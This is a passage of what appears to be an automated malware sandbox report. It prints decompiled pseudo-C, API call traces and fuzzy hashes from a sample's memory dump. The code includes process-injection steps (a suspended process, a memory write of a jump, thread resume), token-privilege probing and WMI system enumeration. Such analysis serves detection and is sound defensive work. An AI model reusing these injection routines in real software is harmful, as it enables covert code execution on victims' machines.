				E10008600(_t86, 0xfffffffe);
				_t86 = _t86 + 4;
				_t82 = _t82 - 1;
			}

APIs

Part of subcall function 1000AE4C: memset.MSVCRT ref: 1000AE6B
Part of subcall function 1000AE4C: CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AE8B

Part of subcall function 1000CB82: memset.MSVCRT ref: 1000CBC3
Part of subcall function 1000CB82: GetThreadContext.KERNELBASE(?,00010002,?,00000000,00000000), ref: 1000CBE4
Part of subcall function 1000CB82: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC2D
Part of subcall function 1000CB82: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC4A
Part of subcall function 1000CB82: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC6B
Part of subcall function 1000CB82: FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC7E

GetLastError.KERNEL32(?,00000001), ref: 1000CAD7
ResumeThread.KERNELBASE(?,?,00000001), ref: 1000CAE5
FindCloseChangeNotification.KERNELBASE(00000000,?,00000001), ref: 1000CB08

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryVirtual$ProtectThreadmemset$ChangeCloseContextCreateErrorFindFreeLastLibraryNotificationProcessResumeWrite
String ID:
API String ID: 444334107-0
Opcode ID: f017f5ca36172552206ab6814e1b6acc202bbb2cd86ed6c5daeb2e80a43bce25
Instruction ID: e521cf2fa20f76da4a6a589b73753f886015824dfe40e4b6c65f35b4029dd3c9
Opcode Fuzzy Hash: f017f5ca36172552206ab6814e1b6acc202bbb2cd86ed6c5daeb2e80a43bce25
Instruction Fuzzy Hash: BC416175A00319AFEB41CFA8C985EAE77F9EF58390F624168F501E7265DB30AE04CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1000B97E, Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E1000B97E(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E100085EA(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E10008600( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}

APIs

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,73BCF500,00000000,10000000,00000000,00000000,?,1000BA1D,?,00000000,?,1000D0B3), ref: 1000B999
GetLastError.KERNEL32(?,1000BA1D,?,00000000,?,1000D0B3), ref: 1000B9A0

Part of subcall function 100085EA: RtlAllocateHeap.NTDLL(00000008,?,?,10008F6A,00000100,?,10005FA8), ref: 100085F8

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,1000BA1D,?,00000000,?,1000D0B3), ref: 1000B9CF

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: InformationToken$AllocateErrorHeapLast
String ID:
API String ID: 2499131667-0
Opcode ID: 9279372076375fae395de7efc729ad16c310fd33d23b52249bdd110484013589
Instruction ID: 284435f3304a0403768820705fc5d69a9fc577f17fcada2a8c023e96f564319f
Opcode Fuzzy Hash: 9279372076375fae395de7efc729ad16c310fd33d23b52249bdd110484013589
Instruction Fuzzy Hash: C401AD72600625BFE724CFA5DC89D8F7FECEF456E47220126FA05E2214E630DE0087A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000AE4C, Relevance: 3.0, APIs: 2, Instructions: 46
processCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E1000AE4C(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;
				WCHAR* _t15;
				int _t19;
				struct _PROCESS_INFORMATION* _t20;

				_t20 = __edx;
				_t15 = __ecx;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t19 = 0x44;
				memset( &_v72, 0, _t19);
				_v72.cb = _t19;
				_t11 = CreateProcessW(0, _t15, 0, 0, 0, 4, 0, 0,  &_v72, _t20);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}

0x1000ae55
0x1000ae5b
0x1000ae5f
0x1000ae60
0x1000ae61
0x1000ae62
0x1000ae66
0x1000ae6b
0x1000ae73
0x1000ae8b
0x1000ae91
0x1000ae99

APIs

memset.MSVCRT ref: 1000AE6B
CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AE8B

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateProcessmemset
String ID:
API String ID: 2296119082-0
Opcode ID: 174ec3214e28821afa587fbbfd75607311efd5e59e5c1ad3bc0eb5b6b150231f
Instruction ID: 317c0f0a3250aa545c808d97f4cc2eb77fe6aff884bafd0b8a01d2d5859a8f4e
Opcode Fuzzy Hash: 174ec3214e28821afa587fbbfd75607311efd5e59e5c1ad3bc0eb5b6b150231f
Instruction Fuzzy Hash: 61F01CF26042187FF760DAADDC46EBBB7ACCB88664F104532FA05D61A0E560ED0582A1

Uniqueness

Uniqueness Score: -1.00%

Function 1000E1C7, Relevance: 3.0, APIs: 2, Instructions: 35
libraryCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E1000E1C7(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E100095AD(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E1000E17C(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E100085A8( &_v8);
				return _t25;
			}

0x1000e1ca
0x1000e1cd
0x1000e1d3
0x1000e1d5
0x1000e1da
0x1000e1dc
0x1000e1e6
0x1000e1e7
0x1000e1f6
0x1000e1e9
0x1000e1e9
0x1000e1e9
0x1000e1fa
0x1000e201
0x1000e207
0x1000e207
0x1000e20c
0x1000e217

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,1001BA20), ref: 1000E1E9
LoadLibraryA.KERNELBASE(00000000,00000000,00000001,?,1001BA20), ref: 1000E1F6

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: cf321a245d88a0638fbef26b27aa7ee3fe0e7c4b77512a4ccbee289a1163a098
Instruction ID: a81f8a8a0c32fb3f2a3472acf433f6b75368d58d8bdf92bb45fed00c9d335e66
Opcode Fuzzy Hash: cf321a245d88a0638fbef26b27aa7ee3fe0e7c4b77512a4ccbee289a1163a098
Instruction Fuzzy Hash: D1F08231700164ABF704DB6DDC8589EB3ECDB987D1711413AF406E3155DA70EE4087E1

Uniqueness

Uniqueness Score: -1.00%

Function 1000CCCB, Relevance: 2.5, APIs: 2, Instructions: 48
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000CCCB(void* __ecx, intOrPtr _a4, signed int _a8) {
				CHAR* _v8;
				int _t28;
				signed int _t31;
				signed int _t34;
				signed int _t35;
				void* _t38;
				signed int* _t41;

				_t41 = _a8;
				_t31 = 0;
				if(_t41[1] > 0) {
					_t38 = 0;
					do {
						_t3 =  &(_t41[2]); // 0xe6840d8b
						_t34 =  *_t3;
						_t35 = 0;
						_a8 = 0;
						if( *((intOrPtr*)(_t38 + _t34 + 8)) > 0) {
							_v8 = _a4 + 0x24;
							while(1) {
								_t28 = lstrcmpiA(_v8,  *( *((intOrPtr*)(_t38 + _t34 + 0xc)) + _t35 * 4));
								_t14 =  &(_t41[2]); // 0xe6840d8b
								_t34 =  *_t14;
								if(_t28 == 0) {
									break;
								}
								_t35 = _a8 + 1;
								_a8 = _t35;
								if(_t35 <  *((intOrPtr*)(_t34 + _t38 + 8))) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t41 =  *_t41 |  *(_t34 + _t38);
						}
						L8:
						_t31 = _t31 + 1;
						_t38 = _t38 + 0x10;
						_t20 =  &(_t41[1]); // 0x1374ff85
					} while (_t31 <  *_t20);
				}
				Sleep(0xa);
				return 1;
			}

APIs

lstrcmpiA.KERNEL32(?,?,00000128,00000000,?,?,?,1000ABF3,?,?), ref: 1000CCFF
Sleep.KERNELBASE(0000000A,00000000,?,?,?,1000ABF3,?,?), ref: 1000CD31

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: Sleeplstrcmpi
String ID:
API String ID: 1261054337-0
Opcode ID: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
Instruction ID: 926fc2af3184635391a797f2ab8243a47acf96363bf1e1ad5409ce987fcc7f05
Opcode Fuzzy Hash: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
Instruction Fuzzy Hash: 21018C31600709AFEB10CF6AC8C0D5AB7E6FF983A4711C07EE95A8B215D230FA42DB50

Uniqueness

Uniqueness Score: -1.00%

Function 1000BA48, Relevance: 1.6, APIs: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E1000BA48(void* __ecx, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				char _t37;
				union _TOKEN_INFORMATION_CLASS _t44;
				char _t45;
				intOrPtr* _t48;

				_t37 = 0;
				_v28 = 0x500;
				_t45 = 0;
				_v32 = 0;
				_t20 = E1000B92C(__ecx);
				_v16 = _t20;
				if(_t20 != 0) {
					_push( &_v24);
					_t44 = 2;
					_t21 = E1000B97E(_t44); // executed
					_t48 = _t21;
					_v20 = _t48;
					if(_t48 == 0) {
						L10:
						FindCloseChangeNotification(_v16);
						if(_t48 != 0) {
							E10008600( &_v20, _t37);
						}
						return _t45;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v32);
					_t29 =  *0x1001e68c; // 0x87ffa40
					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
						goto L10;
					}
					if( *_t48 <= 0) {
						L9:
						_t31 =  *0x1001e68c; // 0x87ffa40
						 *((intOrPtr*)(_t31 + 0x10))(_v12);
						_t37 = 0;
						goto L10;
					}
					_t9 = _t48 + 4; // 0x4
					_t33 = _t9;
					_v8 = _t33;
					while(1) {
						_push(_v12);
						_push( *_t33);
						_t34 =  *0x1001e68c; // 0x87ffa40
						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
							break;
						}
						_t37 = _t37 + 1;
						_t33 = _v8 + 8;
						_v8 = _t33;
						if(_t37 <  *_t48) {
							continue;
						}
						goto L9;
					}
					_t45 = 1;
					goto L9;
				}
				return _t20;
			}

APIs

Part of subcall function 1000B92C: GetCurrentThread.KERNEL32 ref: 1000B93F
Part of subcall function 1000B92C: GetLastError.KERNEL32(?,?,1000BA62,73BCF500,10000000), ref: 1000B94D
Part of subcall function 1000B92C: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,1000BA62,73BCF500,10000000), ref: 1000B966

Part of subcall function 1000B97E: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,73BCF500,00000000,10000000,00000000,00000000,?,1000BA1D,?,00000000,?,1000D0B3), ref: 1000B999
Part of subcall function 1000B97E: GetLastError.KERNEL32(?,1000BA1D,?,00000000,?,1000D0B3), ref: 1000B9A0

FindCloseChangeNotification.KERNELBASE(?,00000000,73BCF500,10000000), ref: 1000BAEC

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentErrorLast$ChangeCloseFindInformationNotificationProcessThreadToken
String ID:
API String ID: 2850644500-0
Opcode ID: 9ae93498d3beea09f533c95f90db021d1976d1c1be687782160d81f63b76ad47
Instruction ID: 1adc8f8ddfe33038bce3f4a157c31629282edc9b40e44d36358bc691b51babd1
Opcode Fuzzy Hash: 9ae93498d3beea09f533c95f90db021d1976d1c1be687782160d81f63b76ad47
Instruction Fuzzy Hash: 75215071A00619AFEB04DFA9DC85EAEB7F8EF48780B514069F601E7255D730DD00CB51

Uniqueness

Uniqueness Score: -1.00%

Function 10005E7E, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10005E7E() {
				intOrPtr _t3;

				_t3 =  *0x1001e684; // 0x87ff878
				 *((intOrPtr*)(_t3 + 0x2c))( *0x1001e6a8, 0xffffffff);
				ExitProcess(0);
			}

0x10005e7e
0x10005e8b
0x10005e95

APIs

ExitProcess.KERNEL32(00000000), ref: 10005E95

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
Instruction ID: 9fe5a48d1d7df1d44c8ff89900a8b99800cce3c20b8b2062506d45ae6f81fc06
Opcode Fuzzy Hash: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
Instruction Fuzzy Hash: D4C002712151A1AFEA409BA4CD88F0877A1AB68362F9282A5F5259A1F6CA30D8009B11

Uniqueness

Uniqueness Score: -1.00%

Function 100085EA, Relevance: 1.5, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100085EA(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x1001e768, 8, _a4); // executed
				return _t2;
			}

0x100085f8
0x100085ff

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,10008F6A,00000100,?,10005FA8), ref: 100085F8

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f52ff42663d9d892c94b44c72d67274e92aa5b68dc6bf6c7fa1343fdaf41d4b4
Instruction ID: 9a291c990e77f445172f2a03277bd68ee76f3999a476da38a02c0ca707d440ed
Opcode Fuzzy Hash: f52ff42663d9d892c94b44c72d67274e92aa5b68dc6bf6c7fa1343fdaf41d4b4
Instruction Fuzzy Hash: CDB0923148461CFBFA421B91DC45A88BF69E708759F00C010F60C040B2CA72AA649B90

Uniqueness

Uniqueness Score: -1.00%

Function 100085D5, Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100085D5() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x1001e768 = _t1;
				return _t1;
			}

0x100085de
0x100085e4
0x100085e9

APIs

HeapCreate.KERNELBASE(00000000,00080000,00000000,10005F84), ref: 100085DE

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: c3188154532433d8b109a5d37b9c6942cb9ab30fb6aa49832194727f4698bc8e
Instruction ID: 016c441e565f87a7eecd2a7559f4fcf8aaa250baf654664f6a0682c010cac13f
Opcode Fuzzy Hash: c3188154532433d8b109a5d37b9c6942cb9ab30fb6aa49832194727f4698bc8e
Instruction Fuzzy Hash: C7B012B0684B1056F2D01B204DC6B043590A308B0AF304000F308581D0C6B05104CB04

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1000DB47, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E1000DB47(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E1000D52E(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E100085EA(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E10008600( &_v60, 0xfffffffe);
					E1000D5E2( &_v104);
					return _t320;
				}
				_t165 = E100095C7(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E100095C7(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E100092CB(_t165);
				_v60 = _t322;
				E100085BB( &_v52);
				E100085BB( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E100095C7(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E100085BB( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E10008600( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E100091C9(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E100091C9(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E1000867E(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E100085EA( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E10008600(_t136, 0);
								E10008600( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E100091C9(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E100095C7(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E100095C7(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E100085EA(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E100085BB( &_v92);
											E100085BB( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E10009626();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E100085EA(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E100095C7(_t283, 0x219);
										E10009626( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E100085BB( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E100091C9(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E1000DA2B( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E10008600( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}

APIs

Part of subcall function 1000D52E: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D541
Part of subcall function 1000D52E: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D552
Part of subcall function 1000D52E: CoCreateInstance.OLE32(1001B840,00000000,00000001,1001B850,?,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D569
Part of subcall function 1000D52E: SysAllocString.OLEAUT32(00000000), ref: 1000D574
Part of subcall function 1000D52E: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,1000D82E,00000C5B,00000000,?,00000000), ref: 1000D59F

Part of subcall function 100085EA: RtlAllocateHeap.NTDLL(00000008,?,?,10008F6A,00000100,?,10005FA8), ref: 100085F8

SysAllocString.OLEAUT32(00000000), ref: 1000DBF0
SysAllocString.OLEAUT32(00000000), ref: 1000DC04
SysFreeString.OLEAUT32(?), ref: 1000DF8D
SysFreeString.OLEAUT32(?), ref: 1000DF96

Part of subcall function 10008600: HeapFree.KERNEL32(00000000,00000000,00000001,000000FF,10006020), ref: 10008646

Strings

TRUE, xrefs: 1000DDB2
FALSE, xrefs: 1000DDB9

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
String ID: FALSE$TRUE
API String ID: 1290676130-1412513891
Opcode ID: e90d5b011f5971edd279b69304d2787e03839083f027a6c7d93be243f4a939b2
Instruction ID: 87b8d808fb387f8005252730a36ddfdad2d71f946437a17ee317db8df35d95d4
Opcode Fuzzy Hash: e90d5b011f5971edd279b69304d2787e03839083f027a6c7d93be243f4a939b2
Instruction Fuzzy Hash: 82E16375D006199FEB05EFE4CC85EEEBBB9FF08380F10455AE505AB259DB31AA05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000E673, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E1000E673(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
